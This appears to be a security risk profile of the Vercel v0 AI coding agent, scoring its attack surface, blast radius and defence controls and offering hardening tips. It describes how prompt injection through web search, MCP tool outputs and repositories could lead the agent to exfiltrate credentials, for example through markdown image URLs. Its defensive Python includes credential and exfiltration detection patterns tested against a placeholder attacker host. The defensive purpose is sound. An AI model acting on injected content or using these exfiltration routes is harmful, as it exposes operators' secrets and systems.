Vercel v0 Agent Security Risks

[Figure: AI Risk Quadrant position. Axes: Defense Controls (6) and Attack Surface (4.92). Quadrants: Exposed Giants, Fortified Leaders, Humble Providers, Tight Operators.]
AIRQ Score: 5.46 (High)
Attack Surface: 4.92 (Medium)
Blast Radius: 5.88 (High)
Defense Controls: 6 (High)
About The Agent

Vercel v0 is a cloud-hosted AI coding agent that generates, executes, and deploys full-stack web applications from natural language prompts within a per-chat sandboxed environment. The agent runs as a SaaS service at v0.app, executing code in Firecracker microVMs with configurable terminal permission modes and marketplace MCP integrations. The primary risk surface centers on broad external data ingestion through web search, browser use, and bring-your-own MCP servers feeding unfiltered content into the reasoning loop, combined with default-open outbound network access and one-click deployment to production infrastructure.

About the AI Risk Quadrant

Humble Providers agents combine a moderate attack surface with a below-threshold blast radius, indicating meaningful vendor investment in containment relative to exposure. Vercel v0 lands here with an Attack Surface score of 4.92 driven by external data ingestion, MCP transport vulnerabilities, and CLI credential leaks, a Blast Radius of 5.88 shaped by default-open network egress and one-click production deployment, and Defense Controls at 6 anchored by Firecracker sandbox isolation. Operators should prioritize restricting outbound network policy and disabling the Full terminal permission mode to maintain this quadrant placement.

1 Key Risks

This section summarizes the most critical security risks an operator inherits when deploying this agent in its documented default configuration. Vercel v0 presents a moderate attack surface driven by broad external data ingestion and default-open egress, partially offset by Firecracker sandbox isolation and configurable terminal permission modes.

Key Input Risks
Vercel v0 ingests user text prompts, uploaded images, web search results, browser-fetched external URLs, GitHub repository contents, and MCP server tool outputs into its reasoning loop on the default configuration. Input validation is described generically as code analysis before execution, but no documented prompt-injection classifier or content-type gate filters incoming data before it reaches the model. [1][8][9]
Key Execution Risks
Vercel v0 executes bash commands, npm/pnpm/bun package installs, and generated application code inside a per-chat Firecracker microVM sandbox with configurable permission modes. The sandbox isolation layer uses well-understood Firecracker technology documented by the vendor, though no independent red-team audit of the v0-specific sandbox configuration has been published. [10][13]
Key Action Risks
On the default Auto permission mode, allowlisted read-only terminal commands execute without operator approval while writes, network operations, and shell wrappers require confirmation. The highest-blast-radius default action is one-click deployment to Vercel production infrastructure, which publishes generated code to a globally accessible URL with automatic HTTPS. [13][17]
Key Output Risks
Vercel v0 emits generated source code, rendered application previews, terminal output, and deployment artifacts without documented data-loss prevention or credential-redaction controls on agent output. The vendor acknowledges markdown image rendering as an exfiltration vector in engineering guidance, and deployed applications become publicly accessible output channels. [9][11]
Key Monitoring Risks
SOC 2 Type 2 attestation covers audit logging controls at the enterprise tier, but per-action anomaly detection, SIEM forwarding, and real-time alerting for individual agent sessions are not documented as defaults. Individual operator-level monitoring of agent actions within a chat session is the primary blind spot on the standard configuration. [9][18]

2 AIRQ Scores

The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Vercel v0 balances a moderate external-facing attack surface against meaningful sandbox isolation, landing in a risk tier where targeted hardening yields measurable improvement.

AIRQ Metrics

Vercel v0 occupies the Humble Providers quadrant with an Attack Surface of 4.92, Blast Radius of 5.88, and Defense Controls at 6, placing it just below the boundary into higher-risk quadrants.

Attack Surface and Blast Radius are scored out of 10 and Defense Controls out of 15; the composite AIRQ score reflects defensive capability relative to exposure on a 15-point scale.

Metric | Score | Comments
AIRQ Score | 5.46 | A mid-range composite indicating that vendor-provided sandbox isolation and permission modes partially offset the agent's broad input ingestion and default-open egress posture.
Blast Radius | 5.88 / 10 | Network egress and deployment access are the dominant blast surfaces, reflecting default allow-all outbound traffic and one-click publish to production infrastructure.
Attack Surface | 4.92 / 10 | External data, tool execution, output processing, and configuration surfaces drive the score, with all three trifecta conditions met on the default configuration.
Defense Controls | 6 / 15 | Firecracker microVM isolation and three-tier terminal permission modes are vendor-documented, while input filtering specifics and output data-loss controls are undisclosed.

3 Attack Surface

Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. The dominant exposures for Vercel v0 are its unfiltered external data channels, full bash shell execution, and MCP transport surface where an open prototype pollution vulnerability exists.

Attack Surface Metrics

Higher scores indicate surfaces where the agent ingests or processes attacker-influenced content with fewer vendor-documented controls on the default configuration.

Each row maps an attack surface to its adjusted score and a comment summarizing the evidence that anchors the assessment.

Surface | Score | Comments
User Input | 2 / 4 | User prompts and uploaded images enter the reasoning loop through the web UI with vendor-described input validation, though no specific prompt-injection detection mechanism is documented. [8][9]
External Data | 3 / 4 | Web search, browser use, repository imports, and marketplace MCP integrations inject third-party-authored content into the reasoning loop without a documented content-classification gate on the default configuration. [14][15]
Memory | 1 / 4 | Filesystem state persists within a single chat session but resets on new chat creation, meaning no cross-session memory store, vector database, or learned-behavior accumulation carries between conversations. [10]
Reasoning | 2 / 4 | The composite model architecture uses a dynamic system prompt and a custom AutoFix model for error correction, with no documented operator-accessible controls over reasoning-loop behavior. [16]
Planning | 2 / 4 | Terminal command permission modes gate multi-step plan execution at the action layer, but planning-level autonomy controls such as step-count limits or plan-review gates are not documented. [13]
Tool Execution | 3 / 4 | Full bash shell access runs inside the sandbox with the default Auto mode auto-approving allowlisted commands; the Full mode bypasses all approval gates entirely. [13]
Orchestration | 2 / 4 | Multi-step task coordination within a single supervised chat session is the documented orchestration boundary, with no background scheduling or daemon-mode execution; a workflow webhook vulnerability allowed unauthenticated payload injection into task execution. [3][15]
Inter-Agent | 3 / 4 | MCP marketplace and bring-your-own servers introduce inter-agent message surfaces, and an open prototype pollution vulnerability in the AI SDK MCP transport allows malicious server metadata to corrupt the agent runtime. [4][14]
Output Processing | 3 / 4 | Vendor engineering guidance identifies markdown image rendering as a known exfiltration vector, and independent threat intelligence documents v0-generated output abused for credential phishing at scale. [5][6][9][11]
Configuration | 3.5 / 4 | CVE-2026-44479 demonstrated that the CLI non-interactive mode leaked plaintext auth tokens in suggested command output, exposable in CI/CD logs and agent session transcripts. [2]

The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. Vercel v0 ingests web search results and MCP tool outputs from third-party servers, accesses operator environment variables and database credentials through marketplace integrations, and maintains default allow-all outbound network access from the sandbox.

Lethal Trifecta · Complete (3 of 3)

Vercel v0 exhibits all three of these conditions in its documented default configuration:

  • Untrusted input — Web search, browser use, repository imports, and MCP server responses deliver third-party-authored content into the prompt context. [14][15]
  • Sensitive data — Environment variables containing API keys and database credentials are accessible to sandbox code through the project configuration panel. [9][10]
  • External egress — Default sandbox network policy permits unrestricted outbound traffic, and one-click deployment publishes to globally accessible production URLs. [10][17]
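
The three conditions above can be expressed as a simple check. The sketch below is illustrative only: the `SessionProfile` fields and the "Partial" and "Absent" labels are assumptions introduced here, not part of the AIRQ methodology; only the "Complete (3 of 3)" wording comes from this profile.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SessionProfile:
    """Hypothetical description of what one agent session can do."""
    ingests_untrusted_content: bool    # e.g. web search results, MCP tool outputs
    reads_sensitive_data: bool         # e.g. API keys held in environment variables
    can_reach_arbitrary_hosts: bool    # e.g. allow-all outbound network policy


def trifecta_status(profile: SessionProfile) -> str:
    """Summarize how many of the three trifecta conditions hold."""
    met = sum([
        profile.ingests_untrusted_content,
        profile.reads_sensitive_data,
        profile.can_reach_arbitrary_hosts,
    ])
    label = "Complete" if met == 3 else "Partial" if met > 0 else "Absent"
    return f"{label} ({met} of 3)"


# Default configuration as described in this profile.
v0_default = SessionProfile(True, True, True)
# Same session once outbound traffic is restricted to an allowlist.
v0_restricted_egress = SessionProfile(True, True, False)

print(trifecta_status(v0_default))            # Complete (3 of 3)
print(trifecta_status(v0_restricted_egress))  # Partial (2 of 3)
```

Removing any one condition breaks the full chain, which is why the hardening tips concentrate on egress policy and approval gates rather than on eliminating external data ingestion outright.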

4 Blast Radius

The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. A compromised Vercel v0 session reaches the sandbox filesystem, unrestricted outbound network, operator credentials through brokered access, and production deployment infrastructure.

Blast Radius Metrics

Higher scores reflect broader impact from a single compromised chat session, with network and deployment access carrying the most operator-visible consequences.

Each row connects a blast radius factor to its score and the documented capability boundary that determines the damage ceiling.

Factor | Score | Comments
Code execution | 2 / 4 | Generated code and shell commands execute inside a Firecracker microVM with user-level privileges, contained within the per-chat sandbox boundary. [10]
File system access | 2 / 4 | The agent has full read and write access to the project filesystem within the sandbox, but filesystem state does not persist across chat sessions. [10]
Network access | 3 / 4 | The sandbox default network policy is allow-all outbound, with SNI-based egress firewall filtering available as an opt-in configuration for enterprise customers. [10][18]
Credential access | 2 / 4 | Credentials are brokered at the network layer through a secret injection proxy, giving the agent functional service access without direct exposure of plaintext secrets in the sandbox scope; an infrastructure breach via compromised OAuth tokens exposed customer environment variables. [7][12][19]
Autonomous action | 2 / 4 | The Auto permission mode requires operator approval for writes, network operations, and shell wrappers, limiting autonomous action to allowlisted read-only commands on the default configuration. [13]
Deployment access | 3 / 4 | One-click publish deploys generated applications to Vercel production infrastructure with automatic HTTPS, global CDN distribution, and zero-downtime updates. [17]

5 Defense Controls

Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. Vercel v0 documents Firecracker sandbox isolation and three-tier terminal permission modes as default controls, while input filtering specifics and output data-loss prevention remain undisclosed.

Defense Controls Metrics

Higher scores indicate stronger vendor-provided safeguards on the default configuration, with the inverted scale reflecting what is in place rather than what is missing.

Each component is scored on what the vendor ships and documents for the default configuration, distinguishing between vendor-implemented and operator-managed controls.

Component | Score | Comments
Input Guardrails | 1 / 3 | The vendor describes code analysis before execution and environment variable exposure warnings, but no specific prompt-injection classifier, content-type filter, or ML-based input screening is documented. [9]
Execution Isolation | 2 / 3 | Per-chat Firecracker microVM isolation with per-user boundaries and credential brokering at the network layer provides a documented, architecturally specific containment boundary. [10][12]
Action Controls | 1 / 3 | Three terminal permission modes with configurable allowlists and denylists exist, and marketplace MCP integrations use the Ask permission mode requiring per-call approval, but the Full mode disables all approval gates. [13][14]
Output Guardrails | 1 / 3 | Server-side versus client-side environment variable distinction and smart refactoring to move sensitive code server-side are documented, but no output redaction, DLP, or exfiltration-channel blocking is described. [9][11]
Monitoring | 1 / 3 | SOC 2 Type 2 attestation covers enterprise audit logging and the AI Gateway provides usage metering, but per-session anomaly detection and SIEM forwarding are not documented defaults. [9]
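
The five component scores add up to the headline Defense Controls value. The quick check below assumes a plain unweighted sum, which happens to reproduce 6 / 15; the profile does not state the aggregation method, so that is an inference rather than a documented formula.

```python
# Component scores copied from the Defense Controls table; each is out of 3.
component_scores = {
    "Input Guardrails": 1,
    "Execution Isolation": 2,
    "Action Controls": 1,
    "Output Guardrails": 1,
    "Monitoring": 1,
}
MAX_PER_COMPONENT = 3

total = sum(component_scores.values())
maximum = MAX_PER_COMPONENT * len(component_scores)

print(f"Defense Controls: {total} / {maximum}")  # Defense Controls: 6 / 15
```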

6 Hardening Tips

This section lists concrete actions an operator can take to reduce the risks reported above, grouped by which defense control each tip strengthens. Operators should prioritize restricting sandbox egress policy and enforcing the Ask terminal permission mode to break the trifecta conditions on the default configuration.

Input Guardrails

Input guardrails intercept adversarial content before it reaches the reasoning loop.

  • Policy: Require security review of all MCP server integrations before adding them to v0 workspaces, vetting OAuth scopes and data access permissions.
  • Configuration: Disable browser use and web search capabilities in v0 settings for workspaces handling sensitive codebases where external content ingestion is unnecessary.
  • Engineering: Deploy a prompt-injection detection proxy between the v0 agent and external data sources to classify and filter adversarial content before it enters the reasoning loop.
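
The scope-vetting part of the MCP review could be backed by a small check like the one below. This is a minimal sketch: the server names, scope strings, and the `APPROVED_SCOPES` table are hypothetical placeholders, and nothing here reflects a v0 or MCP API.

```python
# Hypothetical policy table: scopes a security reviewer has approved per MCP server.
APPROVED_SCOPES = {
    "example-db-mcp": {"db:read"},
    "example-issues-mcp": {"issues:read", "issues:write"},
}


def review_mcp_request(server: str, requested_scopes: set[str]) -> tuple[bool, set[str]]:
    """Return (approved, excess_scopes) for an MCP integration request.

    Servers that have not been reviewed are rejected outright, and every
    requested scope is reported as excess so the reviewer sees what was asked for.
    """
    approved = APPROVED_SCOPES.get(server)
    if approved is None:
        return False, set(requested_scopes)
    excess = requested_scopes - approved
    return not excess, excess


print(review_mcp_request("example-db-mcp", {"db:read"}))
print(review_mcp_request("example-db-mcp", {"db:read", "db:write"}))
```

Defaulting to rejection for unknown servers keeps bring-your-own integrations out of a workspace until someone has looked at them.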

Execution Isolation

Execution isolation contains what a compromised agent can do on the host.

  • Policy: Prohibit use of the Full terminal permission mode in team workspace policies to prevent bypass of all shell approval gates on the Tool Execution surface.
  • Configuration: Configure the sandbox egress firewall to allowlist only required domains, blocking unrestricted outbound network access from the microVM environment.
  • Engineering: Instrument sandbox network traffic logging to capture all outbound connections and integrate with organizational SIEM for anomaly detection on agent-initiated requests.
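
To make the domain allowlisting idea concrete, the sketch below shows one way hostname matching against an allowlist might work. It is not the Vercel Sandbox firewall configuration syntax; the function name, the wildcard convention, and the example entries are assumptions for illustration.

```python
def is_egress_allowed(host: str, allowlist: list[str]) -> bool:
    """Return True if host matches an allowlist entry.

    Entries are either exact hostnames ("registry.npmjs.org") or wildcard
    suffixes ("*.example.com"), which match subdomains but not the bare domain.
    """
    host = host.lower().rstrip(".")
    for entry in allowlist:
        entry = entry.lower()
        if entry.startswith("*."):
            # entry[1:] is ".example.com", so "evilexample.com" does not match.
            if host.endswith(entry[1:]):
                return True
        elif host == entry:
            return True
    return False


# Hypothetical allowlist for a project that only needs its package registry and one API.
ALLOWLIST = ["registry.npmjs.org", "*.example.com"]

print(is_egress_allowed("api.example.com", ALLOWLIST))  # True
print(is_egress_allowed("attacker.test", ALLOWLIST))    # False
```

Matching on the leading dot of the suffix is the detail that matters: a naive `endswith("example.com")` would also admit look-alike domains.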

Action Controls

Action controls govern which tools and actions the agent can invoke autonomously.

  • Policy: Establish a deployment approval workflow requiring human review before any v0-generated application is published to production infrastructure.
  • Configuration: Switch the default terminal permission mode from Auto to Ask, requiring explicit operator approval for every terminal command including allowlisted read-only operations.
  • Engineering: Integrate v0 deployment actions with a CI/CD pipeline that runs static analysis and security scanning before any generated code reaches production.
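
The difference between the Ask, Auto, and Full modes described in this profile can be sketched as a decision function. The allowlist, the wrapper list, and the metacharacter check below are hypothetical stand-ins; the vendor's actual lists and parsing rules are not reproduced here.

```python
import shlex
from enum import Enum


class Mode(Enum):
    ASK = "ask"
    AUTO = "auto"
    FULL = "full"


# Hypothetical allowlist of read-only commands.
READ_ONLY_ALLOWLIST = {"ls", "cat", "pwd", "head", "tail"}
# Hypothetical set of wrappers that can hide an arbitrary inner command.
SHELL_WRAPPERS = {"bash", "sh", "zsh", "env", "xargs"}
# Characters that introduce redirection, chaining, or command substitution.
SHELL_METACHARACTERS = ("|", ">", "<", ";", "&", "`", "$(")


def needs_approval(command: str, mode: Mode) -> bool:
    """Decide whether the operator must confirm a terminal command."""
    if mode is Mode.FULL:
        return False  # every approval gate is bypassed
    if mode is Mode.ASK:
        return True   # every command is confirmed, even read-only ones
    # AUTO: only plain, allowlisted read-only commands run unattended.
    if any(token in command for token in SHELL_METACHARACTERS):
        return True
    try:
        tokens = shlex.split(command)
    except ValueError:
        return True   # unparseable input is never auto-approved
    if not tokens or tokens[0] in SHELL_WRAPPERS:
        return True
    return tokens[0] not in READ_ONLY_ALLOWLIST


print(needs_approval("ls -la", Mode.AUTO))        # False
print(needs_approval("bash -c 'ls'", Mode.AUTO))  # True
print(needs_approval("ls -la", Mode.ASK))         # True
```

The sketch fails closed in Auto mode: anything it cannot parse or does not recognize goes to the operator.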

Output Guardrails

Output guardrails inspect what the agent sends to other systems and users.

  • Policy: Require code review of all v0-generated applications before deployment, with particular attention to client-side environment variable exposure and embedded external URLs.
  • Configuration: Enable server-side-only environment variable configuration and disable the NEXT_PUBLIC_ prefix pattern for any workspace containing sensitive credentials.
  • Engineering: Build a post-generation DLP scanner that inspects v0 output for credential patterns and exfiltration payloads, reducing the Output Processing surface by blocking the markdown image exfiltration vector.
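
A post-generation scanner along these lines might start from a handful of regular expressions. The sketch below is deliberately small and assumes a hypothetical trusted image host; the patterns are illustrative, and a production scanner would need a much broader, tuned rule set.

```python
import re
from urllib.parse import urlparse

# Illustrative text patterns only.
TEXT_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    # Sensitive-looking names exposed to the browser through the NEXT_PUBLIC_ prefix.
    "sensitive_public_env_name": re.compile(
        r"\bNEXT_PUBLIC_[A-Z0-9_]*(?:SECRET|TOKEN|PASSWORD|PRIVATE)[A-Z0-9_]*\b"
    ),
}
# Captures the URL of a markdown image: ![alt](url ...)
MARKDOWN_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)")
# Hypothetical hosts from which rendered images are considered safe.
TRUSTED_IMAGE_HOSTS = {"assets.example.com"}


def scan_output(text: str) -> list[str]:
    """Return a list of findings for one piece of agent output."""
    findings = []
    for name, pattern in TEXT_PATTERNS.items():
        if pattern.search(text):
            findings.append(f"pattern:{name}")
    for match in MARKDOWN_IMAGE.finditer(text):
        host = urlparse(match.group(1)).hostname
        # Relative image paths have no host and are left alone.
        if host is not None and host not in TRUSTED_IMAGE_HOSTS:
            findings.append(f"external_image:{host}")
    return findings


print(scan_output("![status](https://attacker.test/p.png?d=abc)"))
```

Flagging every image that loads from an untrusted host is blunt, but it addresses the exfiltration path directly: the data leaves in the URL the moment the image is rendered.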

Monitoring

Monitoring captures what the agent did and surfaces anomalies for review.

  • Policy: Require enterprise-tier access for all production v0 workspaces to enable audit logging and establish a review cadence for agent action logs.
  • Configuration: Configure webhook and API callback monitoring to detect unusual integration invocation patterns from v0 sessions interacting with marketplace MCP services.
  • Engineering: Forward v0 audit logs to organizational SIEM infrastructure and build detection rules for anomalous deployment frequency, unusual MCP tool invocations, and credential access patterns.
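
A detection rule for anomalous deployment frequency could be as simple as a sliding-window counter. The sketch below assumes deployment timestamps have already been extracted from the audit log and arrive in chronological order; the class name, threshold, and window are hypothetical, and the audit log schema itself is not specified in this profile.

```python
from collections import deque
from datetime import datetime, timedelta


class DeploymentRateRule:
    """Fire when deployments inside a sliding window exceed a threshold."""

    def __init__(self, max_deployments: int, window: timedelta) -> None:
        self.max_deployments = max_deployments
        self.window = window
        self._recent = deque()  # timestamps still inside the window

    def observe(self, deployed_at: datetime) -> bool:
        """Record one deployment event; return True if the rule fires."""
        self._recent.append(deployed_at)
        cutoff = deployed_at - self.window
        # Drop events that have aged out of the window.
        while self._recent and self._recent[0] <= cutoff:
            self._recent.popleft()
        return len(self._recent) > self.max_deployments


# Hypothetical policy: more than 3 deployments in 10 minutes is suspicious.
rule = DeploymentRateRule(max_deployments=3, window=timedelta(minutes=10))
start = datetime(2025, 1, 1, 12, 0)
results = [rule.observe(start + timedelta(minutes=m)) for m in (0, 1, 2, 3, 20)]
print(results)  # [False, False, False, True, False]
```

The same structure extends to MCP tool invocations or credential access events by keeping one rule instance per workspace and event type.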

7 References

This section lists the evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [7][13]) refer to entries below, listed in citation order.

Selected Vulnerabilities

  1. CVE-2025-48985. Vercel AI SDK input validation bypass allowing filetype whitelist circumvention on file uploads (CVSS 5.3, patched in 5.0.52)
  2. CVE-2026-44479. Vercel CLI non-interactive mode leaks plaintext auth token in suggested command JSON output (CVSS 5.5, patched in 52.0.1)
  3. GHSA-9r75-g2cr-3h76. Vercel Workflow DevKit webhook creation accepted predictable user-specified tokens (CVSS 5.3, patched in 4.2.0-beta.64)
  4. MCP transport prototype pollution. Open issue in Vercel AI SDK: MCP transports use raw JSON.parse, and mergeObjects lacks prototype key filtering

Selected Research

  5. Malicious use of Vercel for credential phishing. Cofense Intelligence documents threat actors using v0 to generate phishing sign-in pages from text prompts
  6. Okta observes v0 used to build phishing sites. Okta Threat Intelligence reproduces v0 abuse for credential phishing page generation impersonating sign-in flows
  7. Vercel breach OAuth supply chain attack. Trend Micro analyzes Vercel breach via compromised Context.ai OAuth tokens exposing customer environment variables
  8. Prompt injection in Vercel AI agents. Security researcher demonstrates prompt injection in Vercel AI SDK agents via unvalidated user input overriding system prompt

Vendor Documentation

  9. v0 security documentation. Vendor security page: threat model, code validation, env var security, SOC 2 Type 2 compliance
  10. v0 sandbox documentation. Per-chat Firecracker microVM isolation, per-user boundaries, configurable egress network policy defaulting to allow-all
  11. Building secure AI agents. Vercel engineering blog on prompt injection, markdown image exfiltration, credential brokering architecture
  12. Security boundaries in agentic architectures. Vercel engineering blog on trust boundary separation, secret injection proxy, sandbox isolation design
  13. v0 terminal commands. Three terminal permission modes (Ask, Auto default, Full) with per-command allowlist and denylist
  14. v0 MCP integrations. Marketplace and bring-your-own MCP server support with OAuth and three permission modes for tool execution
  15. v0 agentic features. Vendor documentation of web search, browser use, error fixing, and MCP integration capabilities

Other Sources

  16. v0 composite model family. Composite model architecture with dynamic system prompt, LLM Suspense, and custom AutoFix model
  17. v0 deployments. One-click publish to Vercel production with global CDN distribution and automatic HTTPS
  18. Vercel Sandbox egress firewall. SNI-based egress firewall filtering with domain allowlisting and CIDR blocking for sandbox environments
  19. Vercel breached via compromised third-party AI tool. Vercel breach via compromised Context.ai OAuth tokens; attacker accessed Google Workspace and customer deployment data